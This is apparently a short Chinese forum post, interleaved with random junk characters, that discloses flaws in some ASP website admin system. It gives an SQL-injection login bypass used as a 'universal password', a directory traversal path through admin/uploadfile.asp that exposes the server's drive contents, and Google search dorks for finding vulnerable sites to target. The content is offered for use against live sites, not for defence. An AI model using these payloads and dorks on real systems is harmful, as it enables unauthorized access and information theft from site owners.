后台万能密码 'or'='or'
" v, O/ c9 T' e \
- T+ B# }6 h( A1 t2 z$ L2 |后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!2 A- D a+ {+ D' V
admin/uploadfile.asp?currentFolder=/upfiles/../
: D4 z* V7 [2 v, [! k9 j' ?
- K) M: D: a5 K' P! M! R }漏洞证明:
( G. i- r; O6 `9 Y2 f
2 E( h8 v, ], A4 g谷歌:inurl:type.asp?id=1 新闻中心9 R/ U: P: ]8 N" p0 A! z: l
或者 :inurl:download_ok.asp?
, Y+ k# p6 d7 H. ^5 X7 e
: P- W5 d5 R. `' w& `3 G; i Z& Y- L |